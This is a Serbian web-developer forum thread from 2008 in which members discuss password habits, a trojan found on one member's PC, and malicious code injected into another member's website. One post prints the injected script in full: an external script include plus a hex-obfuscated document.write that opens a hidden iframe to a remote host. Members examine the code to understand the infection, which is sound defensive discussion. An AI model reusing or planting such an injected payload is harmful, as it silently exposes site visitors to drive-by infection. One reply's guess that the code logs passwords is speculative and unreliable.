DevProTalk

Forumi IT profesionalaca
web development, web design, e-business, SEO


Idite nazad   DevProTalk > Web development i web aplikacije > Web Hosting, web serveri i operativni sistemi
Želite da se reklamirate ekskluzivno na ovoj poziciji? Javite se

Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima

Odgovori
 
Alati teme Način prikaza
Staro 09. 04. 2008.   #11
ppavlovic
expert
Expert
 
Avatar ppavlovic
 
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
ppavlovic će postati "faca" uskoro
Default

Uz Total Commander Ultima Prime dolazi fajl koji se lepo zove

Kôd:
DCE Generic clean: {PE_Generic, C:\Program Files\TC UP\PLUGINS\Tools\FtpPasswordRipper\Windows_Commander_FTP_Password_RIPPER.exe}
Imam program instaliran duze vreme, ali ga nisam koristio. E,sad ... recimo da sam ga jednom u skorije vreme sucajno pokrenuo. Necu jos prstom da upirem u njega.

BTW, nod32 nista ne kaze za doticni fajl, ali ga TrendMicro sysclean cisti.
__________________
MojNoviAuto.com - Tvoj prvi sajt za kupovinu novog automobila
ppavlovic je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #12
artur_dent
I think I'm a sofa...
Professional
 
Avatar artur_dent
 
Datum učlanjenja: 16.11.2005
Poruke: 438
Hvala: 9
28 "Hvala" u 25 poruka
artur_dent is on a distinguished road
Default

Bolje na onaj postIT nalepljen na monitor, kao po drzavnim sluzbama i nekim bankama... sa sve korisnickim nalozima i paswordima...
__________________
fotomanijak.com stvarno manijak
WebManijak.com
artur_dent je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #13
McKracken
Siva eminencija
Grand Master
 
Avatar McKracken
 
Datum učlanjenja: 24.06.2005
Lokacija: Belgrade
Poruke: 930
Hvala: 192
259 "Hvala" u 129 poruka
McKracken ima spektakularnu auruMcKracken ima spektakularnu auruMcKracken ima spektakularnu auru
Pošaljite poruku preko Skype™ za McKracken
Default

roboform.com ... ekstra programce, nije skupo, a radi posao vrhunski.
McKracken je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #14
ppavlovic
expert
Expert
 
Avatar ppavlovic
 
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
ppavlovic će postati "faca" uskoro
Default

Identifikovan trojanac kao TROJ_BUZUS / Trojan.Buzus.
Info:
Citat:
Trojan.Buzus opens a backdoor on the infected machine and tries to steal various information like personal financial data (like credit card numbers, online banking details etc.), passwords from various email and FTP applications (like Trillian, Microsoft Outlook, CuteFTP etc.) It also tries to compromise security settings of various security related products.
Kod mene bio u dva fajla, poaison.exe negde u temporary internet files i winvhelp.exe u \windows\system32
__________________
MojNoviAuto.com - Tvoj prvi sajt za kupovinu novog automobila
ppavlovic je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #15
ivanhoe
Ivan Dilber
Sir Write-a-Lot
 
Avatar ivanhoe
 
Datum učlanjenja: 18.10.2005
Lokacija: Bgd
Poruke: 5.320
Hvala: 104
2.344 "Hvala" u 583 poruka
ivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svima
Pošaljite poruku preko Skype™ za ivanhoe
Default

Citat:
Originalno napisao misk0 Pogledajte poruku
sa papirom pored stola?
pa ja sljakam od kuce, tako da mu papirce dodje i najsigurnija varijanta... imam cak i psa, da brani podatke
__________________
Leadership is the art of getting people to want to do what you know must be done.
ivanhoe je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #16
twix
Web designer
Professional
 
Avatar twix
 
Datum učlanjenja: 09.06.2005
Lokacija: New York
Poruke: 358
Hvala: 52
724 "Hvala" u 64 poruka
twix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskoro
Pošaljite poruku preko Skype™ za twix
Default

Ja recimo imam odštampane sve šifre, tako da takav problem ne može da se desi
twix je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #17
Dragan Babić
Designer guy
Wrote a book
 
Avatar Dragan Babić
 
Datum učlanjenja: 06.06.2005
Lokacija: Novi Sad
Poruke: 1.373
Hvala: 55
42 "Hvala" u 22 poruka
Dragan Babić će postati "faca" uskoro
Pošaljite poruku preko Skype™ za Dragan Babić
Default

U mom slucaju (novootkriveno danas) su se sadrzaji index fajlova zamenjivali ovim kodom:

Kôd:
<script src="http://safe.google-signature.com/webanalytics.js"></script><script>function v47f5126c27ffd(v47f5126c28008){ function v47f5126c28014 () {return 16;} return(parseInt(v47f5126c28008,v47f5126c28014()));}function v47f5126c28048(v47f5126c2804e){ var v47f5126c28060=2; var v47f5126c28053='';for(v47f5126c28059=0; v47f5126c28059<v47f5126c2804e.length; v47f5126c28059+=v47f5126c28060){ v47f5126c28053+=(String.fromCharCode(v47f5126c27ffd(v47f5126c2804e.substr(v47f5126c28059, v47f5126c28060))));}return v47f5126c28053;} document.write(v47f5126c28048('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6261333537643531207372633D5C27687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313634333733292B2733663235393862315C272077696474683D353631206865696768743D323933207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Nemam pojma sta ovo radi.
Dragan Babić je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #18
bluesman
Goran Pilipović
Sir Write-a-Lot
 
Avatar bluesman
 
Datum učlanjenja: 18.05.2005
Lokacija: Beograd
Poruke: 5.450
Hvala: 288
1.247 "Hvala" u 446 poruka
bluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušati
Pošaljite ICQ poruku za bluesman
Default

Koliko ja vidim na prvi pogled ovo preverava karaktere koje kucas na sajtu (verovatno ceka da ukucas password ) i onda salje na neki script na tom njegovom serveru koji dalje verovatno cuva koji je domen i koji je password...

a ovo function v47f5126c28014 () je "mracna fora" Ta funkcija vraca samo broj 16, koji onda sluzi za parseInt da vraca heksadecimalni broj. Stvarno ne znam zasto se toliko trudio da to zamaskira, pa umesto
parseInt (broj, 16)
pise
parseInt(v47f5126c28008,v47f5126c28014())
__________________
Goran Pilipović a.k.a. Ugly Fingers Bradley f.k.a. bluesman
I don't always know what I'm talking about but I know I'm right!
bluesman je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #19
degojs
I'm a PC too.
Wrote a book
 
Avatar degojs
 
Datum učlanjenja: 05.06.2005
Lokacija: Kanada
Poruke: 1.354
Hvala: 82
130 "Hvala" u 89 poruka
degojs će postati "faca" uskorodegojs će postati "faca" uskoro
Default

Citat:
Originalno napisao misk0 Pogledajte poruku
sa papirom pored stola?
Pa to je mnogo sigurnije nego da ih držiš u nekom fajlu - tako ipak neko mora fizički da dođe i uzme taj papir..
__________________
Commercial-Free !!!
degojs je offline   Odgovorite uz citat
Staro 09. 04. 2008.   #20
ivanhoe
Ivan Dilber
Sir Write-a-Lot
 
Avatar ivanhoe
 
Datum učlanjenja: 18.10.2005
Lokacija: Bgd
Poruke: 5.320
Hvala: 104
2.344 "Hvala" u 583 poruka
ivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svimaivanhoe je ime poznato svima
Pošaljite poruku preko Skype™ za ivanhoe
Default

Citat:
Originalno napisao bluesman Pogledajte poruku
Stvarno ne znam zasto se toliko trudio da to zamaskira, pa umesto
parseInt (broj, 16)
pise
parseInt(v47f5126c28008,v47f5126c28014())
verovatno se ime te funkcije generise slucajno, pa je onda ideja da time promeni signature skripti, ako neko (web hosting admin recimo) pokusa da grepuje trazeci zarazene sajtove.. mada slazem se da je glupo
__________________
Leadership is the art of getting people to want to do what you know must be done.
ivanhoe je offline   Odgovorite uz citat
Odgovori


Alati teme
Način prikaza

Pravila pisanja
Možete ne započinjati nove teme
Možete ne slati odgovore
Možete ne slati priloge
Možete ne izmeniti svoje poruke
vB kôd je Uključen
Smajliji su Uključen
[IMG] kod je Uključen
HTML kôd je Isključen
Pogledajte forum

Slične teme
Tema Početna poruka teme Forum Odgovori Poslednja poruka
301 redirkecija "dinamickog" URLa na "dinamicki" URL mb_sa Regular expression i htaccess 7 02. 07. 2008. 19:21
Karakteri "&" i "=" i XMLHttpRequest Milos Vukotic Regular expression i htaccess 18 01. 10. 2007. 15:16
If IT really is a "profession", what is our "pro bono" contribution as IT pros? oksite e-Business 26 12. 01. 2007. 11:18
"Telekom Slovenije" preuzeo "Blic.net" za 390.000 evra Aleksandar Marković Komunikacije 2 23. 12. 2006. 14:23


Vreme je GMT +2. Trenutno vreme je 01:23.


Powered by vBulletin® Verzija 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © DevProTalk. All Rights Reserved.
Mišljenja, saveti, izjave, ponude ili druge informacije ili sadržaji nastali na Sajtu su vlasništvo onoga ko ih je kreirao, a ne DevProTalk.com, tako da ne morate da se oslanjate na njih.
Autori poruka su jedini odgovorni za ovakve sadržaje. DevProTalk.com ne garantuje tačnost, kompletnost ili upotrebnu vrednost informacija, stavova, saveta ili datih izjava. Ne postoje uslovi pod kojima bi mi bili odgovorni za štetu ili gubitak koji je posledica bilo čijeg oslanjanja na nepouzdane informacije, ili bilo kakve informacije nastale kroz komunikaciju između registrovanih članova.
Web sajt može sadržavati linkove na druge web sajtove na Internetu ili neke druge sadržaje. Ne kontrolišemo niti podržavamo te druge web sajtove, niti smo pregledali bilo kakve sadržaje na takvim sajtovima. Mi nećemo biti odgovorni za legalnost, tačnost ili prikladnost bilo kog sadržaja, oglasa, proizvoda, usluga ili informacije lociranim na ili distribuiranih kroz druge web sajtove, niti za bilo kakvu štetu nastalu kao posledica takvih informacija. DevProTalk.com drži i čuva druga prava vlasništva na web sajtu. Web sajt sadrže materijale zaštićene copyright-om, zaštitne znakove i druge informacije o pravu vlasništva ili softver. Članovi mogu poslatu informacije zaštićene pravima vlasništva njihovih nosilaca i ona ostaju zaštićena bez obzira da li su oni koji prenose te informacije to naveli ili ne. Osim informacija koje su u javnom vlasništvu ili za koje dobijete dozvolu, nemate pravo da kopirate, modifikujete ili na bilo koji način menjate, objavljujete, prenosite, distribuirate, izvršavate, prikazujete ili prodajte bilo koju informaciju zaštićenu pravima vlasništva. Slanjem informacija ili sadržaja na bilo koji deo DevProTalk.com, Vi automatski dozvoljavate i predstavljate garanciju da imate pravo da dozvolite DevProTalk.com ili članovima DevProTalk.com bespovratnu, kontinualnu, neograničenu, globalnu dozvolu da koriste, kopiraju, izvršavaju, prikazuju i distribuiraju takve informacije i sadržaje i da iz takvih sadžaja koriste bilo koji deo u bilo koje svrhe, kao i pravo i dozvolu da koriste gore navedene sadržaje. Svi zaštitni znakovi (trademarks), logotipi, oznake usluga, firme ili imena proizvoda koji se pominju na ovom web sajtu su vlasništvo kojim raspolažu njihovi vlasnici.